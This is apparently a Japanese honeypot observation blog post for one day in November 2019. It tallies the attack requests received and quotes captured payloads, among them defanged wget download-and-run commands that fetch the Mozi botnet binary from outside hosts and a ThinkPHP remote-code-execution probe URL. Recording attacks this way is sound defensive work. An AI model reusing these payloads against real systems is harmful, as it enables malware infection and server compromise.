WOWHoneypot観察(257日目)
2019/11/28(木)
トータルは4143件でした。
ハンティングログは以下です。
| 218.21.170[.]249 wget+hxxp[:]//218.21.170[.]249:43098/Mozi.a |
| 5.53.57[.]76 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 4002 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 36 | アクセス | GET / |
| 9 | phpMyAdminの調査 | GET /scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /phpmyadmin/setup.php |
| 8 | phpMyAdminの調査 | GET /phpmyadmin/scripts/_setup.php |
| 8 | phpMyAdminの調査 | GET /mysql/scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /imp/test.php |
| 8 | phpMyAdminの調査 | GET /_phpmyadmin/scripts/setup.php |
| 8 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
| 7 | WordPressの調査 | GET /wp-login.php |
| 7 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 6 | WordPressの調査 | POST /xmlrpc.php |
| 6 | WordPressの調査 | POST /wp-login.php |
| 3 | 調査 | GET /script |
| 2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 1 | Blue Angel Software Suiteの脆弱性を狙った通信 | POST /cgi-bin/webctrl.cgi |
| 1 | 調査 | OPTIONS / |
| 1 | MVPower DVRの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//218.21.170[.]249:43098/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
| 1 | WordPressの調査 | GET ///?author=1 |
にほんブログ村